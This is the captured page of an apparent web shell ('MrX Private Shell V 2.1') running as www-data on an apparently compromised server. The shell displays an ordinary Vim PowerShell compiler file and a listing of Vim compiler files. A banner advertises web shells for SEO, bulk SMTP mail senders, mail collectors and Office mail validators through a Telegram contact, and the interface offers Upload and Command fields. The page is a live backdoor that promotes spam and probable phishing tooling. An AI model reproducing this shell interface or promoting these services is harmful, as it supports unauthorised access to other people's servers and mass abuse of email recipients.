__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
" Vim compiler file
" Compiler:	powershell
" URL: https://github.com/PProvost/vim-ps1
" Last Change: 2020 Mar 30

if exists("current_compiler")
  finish
endif
let current_compiler = "powershell"

if exists(":CompilerSet") != 2		" older Vim always used :setlocal
  command -nargs=* CompilerSet setlocal <args>
endif

let s:cpo_save = &cpo
set cpo-=C

if !exists("g:ps1_makeprg_cmd")
  if executable('pwsh')
    " pwsh is the future
    let g:ps1_makeprg_cmd = 'pwsh'
  elseif executable('pwsh.exe')
    let g:ps1_makeprg_cmd = 'pwsh.exe'
  elseif executable('powershell.exe')
    let g:ps1_makeprg_cmd = 'powershell.exe'
  else
    let g:ps1_makeprg_cmd = ''
  endif
endif

if !executable(g:ps1_makeprg_cmd)
  echoerr "To use the powershell compiler, please set g:ps1_makeprg_cmd to the powershell executable!"
endif

" Show CategoryInfo, FullyQualifiedErrorId, etc?
let g:ps1_efm_show_error_categories = get(g:, 'ps1_efm_show_error_categories', 0)

" Use absolute path because powershell requires explicit relative paths
" (./file.ps1 is okay, but # expands to file.ps1)
let &l:makeprg = g:ps1_makeprg_cmd .' %:p:S'

" Parse file, line, char from callstacks:
"     Write-Ouput : The term 'Write-Ouput' is not recognized as the name of a
"     cmdlet, function, script file, or operable program. Check the spelling
"     of the name, or if a path was included, verify that the path is correct
"     and try again.
"     At C:\script.ps1:11 char:5
"     +     Write-Ouput $content
"     +     ~~~~~~~~~~~
"         + CategoryInfo          : ObjectNotFound: (Write-Ouput:String) [], CommandNotFoundException
"         + FullyQualifiedErrorId : CommandNotFoundException

" Showing error in context with underlining.
CompilerSet errorformat=%+G+%m
" Error summary.
CompilerSet errorformat+=%E%*\\S\ :\ %m
" Error location.
CompilerSet errorformat+=%CAt\ %f:%l\ char:%c
" Errors that span multiple lines (may be wrapped to width of terminal).
CompilerSet errorformat+=%C%m
" Ignore blank/whitespace-only lines.
CompilerSet errorformat+=%Z\\s%#

if g:ps1_efm_show_error_categories
  CompilerSet errorformat^=%+G\ \ \ \ +\ %.%#\\s%#:\ %m
else
  CompilerSet errorformat^=%-G\ \ \ \ +\ %.%#\\s%#:\ %m
endif


" Parse file, line, char from of parse errors:
"     At C:\script.ps1:22 char:16
"     + Stop-Process -Name "invalidprocess
"     +                    ~~~~~~~~~~~~~~~
"     The string is missing the terminator: ".
"         + CategoryInfo          : ParserError: (:) [], ParseException
"         + FullyQualifiedErrorId : TerminatorExpectedAtEndOfString
CompilerSet errorformat+=At\ %f:%l\ char:%c


let &cpo = s:cpo_save
unlet s:cpo_save

" vim:set sw=2 sts=2:

Filemanager

Name Type Size Permission Actions
ant.vim File 941 B 0644
bcc.vim File 449 B 0644
bdf.vim File 473 B 0644
cargo.vim File 1.48 KB 0644
checkstyle.vim File 790 B 0644
cm3.vim File 633 B 0644
context.vim File 1.24 KB 0644
cs.vim File 669 B 0644
csslint.vim File 542 B 0644
cucumber.vim File 561 B 0644
dart.vim File 544 B 0644
dart2js.vim File 625 B 0644
dart2native.vim File 620 B 0644
dartanalyser.vim File 554 B 0644
dartdevc.vim File 616 B 0644
dartdoc.vim File 616 B 0644
dartfmt.vim File 562 B 0644
decada.vim File 1.9 KB 0644
dot.vim File 372 B 0644
dotnet.vim File 1.06 KB 0644
erlang.vim File 276 B 0644
eruby.vim File 913 B 0644
eslint.vim File 429 B 0644
fbc.vim File 636 B 0644
fortran_F.vim File 702 B 0644
fortran_cv.vim File 749 B 0644
fortran_elf90.vim File 802 B 0644
fortran_g77.vim File 1.12 KB 0644
fortran_lf95.vim File 683 B 0644
fpc.vim File 450 B 0644
g95.vim File 677 B 0644
gawk.vim File 865 B 0644
gcc.vim File 1.29 KB 0644
gfortran.vim File 671 B 0644
ghc.vim File 541 B 0644
gjs.vim File 563 B 0644
gm2.vim File 613 B 0644
gnat.vim File 2.36 KB 0644
go.vim File 526 B 0644
haml.vim File 551 B 0644
hare.vim File 633 B 0644
hp_acc.vim File 1.03 KB 0644
icc.vim File 585 B 0644
icon.vim File 837 B 0644
ifort.vim File 690 B 0644
intel.vim File 595 B 0644
irix5_c.vim File 662 B 0644
irix5_cpp.vim File 671 B 0644
javac.vim File 572 B 0644
jest.vim File 794 B 0644
jikes.vim File 522 B 0644
jjs.vim File 493 B 0644
jshint.vim File 557 B 0644
jsonlint.vim File 584 B 0644
mcs.vim File 864 B 0644
mips_c.vim File 691 B 0644
mipspro_c89.vim File 721 B 0644
mipspro_cpp.vim File 701 B 0644
modelsim_vcom.vim File 799 B 0644
msbuild.vim File 529 B 0644
msvc.vim File 359 B 0644
neato.vim File 378 B 0644
ocaml.vim File 1.93 KB 0644
onsgmls.vim File 505 B 0644
pbx.vim File 469 B 0644
perl.vim File 1.36 KB 0644
perlcritic.vim File 778 B 0644
php.vim File 707 B 0644
podchecker.vim File 848 B 0644
powershell.vim File 2.6 KB 0644
pylint.vim File 546 B 0644
pyunit.vim File 407 B 0644
raco.vim File 390 B 0644
racomake.vim File 412 B 0644
racosetup.vim File 408 B 0644
racotest.vim File 414 B 0644
rake.vim File 1.04 KB 0644
rhino.vim File 795 B 0644
rspec.vim File 825 B 0644
rst.vim File 846 B 0644
rubocop.vim File 498 B 0644
ruby.vim File 1017 B 0644
rubyunit.vim File 826 B 0644
rustc.vim File 1.46 KB 0644
sass.vim File 590 B 0644
scdoc.vim File 431 B 0644
se.vim File 742 B 0644
shellcheck.vim File 595 B 0644
sml.vim File 647 B 0644
spectral.vim File 411 B 0644
splint.vim File 2.22 KB 0644
stack.vim File 870 B 0644
standard.vim File 397 B 0644
stylelint.vim File 651 B 0644
tcl.vim File 414 B 0644
tex.vim File 1.71 KB 0644
tidy.vim File 609 B 0644
ts-node.vim File 634 B 0644
tsc.vim File 563 B 0644
typedoc.vim File 610 B 0644
xbuild.vim File 509 B 0644
xmllint.vim File 654 B 0644
xmlwf.vim File 456 B 0644
xo.vim File 615 B 0644
yamllint.vim File 357 B 0644
zig.vim File 617 B 0644
zig_build.vim File 675 B 0644
zig_build_exe.vim File 568 B 0644
zig_test.vim File 548 B 0644
zsh.vim File 481 B 0644
Filemanager